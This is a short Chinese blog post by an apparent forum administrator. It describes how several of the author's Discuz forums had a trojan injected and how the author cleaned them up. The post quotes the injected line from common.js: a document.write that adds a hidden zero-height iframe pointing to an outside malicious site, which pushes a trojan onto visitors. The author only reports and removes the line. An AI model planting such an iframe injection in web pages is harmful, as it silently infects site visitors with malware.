前两天发现偶架的四五个论坛都几乎被挂上了木马,当时比较惊讶,后来发现唯一的一个没有被挂上的是由6.x升级上来的,由于当时Wap的漏洞,所以把Wap给关了,不知道是不是这个原因得以幸免,但不管怎么样,先把wap都关了,至少这样如果真是wap的功能上的漏洞就可以暂时逃过一劫,这次挂的是在common.js里面挂iframe,这样就在悄然无息中让你去一个垃圾网站往你的机器下载木马,好像几个防病毒软件都能检测出来,所以看来这个木马是个很流行的木马啊。
知道了木马就好办了,咱这些论坛都不是怎么popular的坛子,黑客或者什么人挂一次马基本就不来了,把中招的include/js/common.js拉下来看了看,发现这个文件中多了一行
document.write("<iframe src=http://www.hao3956.cn/llsg/12.htm width=50 height=0 border=0></iframe>")网上查了下,中招的不是偶一个啊。。赶紧修复吧。。
上了ftp,覆盖了common.js,然后去关了wap,再跑去discuz的论坛上去看,这段时间貌似很多坛子被挂马,大家都在投诉,肯定是挂了,但谁也不清楚为什么被挂上,众说纷纭,吵吵闹闹,唉,算了吧,挂就挂吧,官方如果不出来澄清bug的问题,大家除了挂马的这个垃圾之外,还真不容易找到为什么被挂。
服务器在美国,应该不是服务器的安全问题,而唯一能解释的就是discuz的bug了,不过要等到官方的承认,又估计不知道什么时候了,呵呵。。
文章评论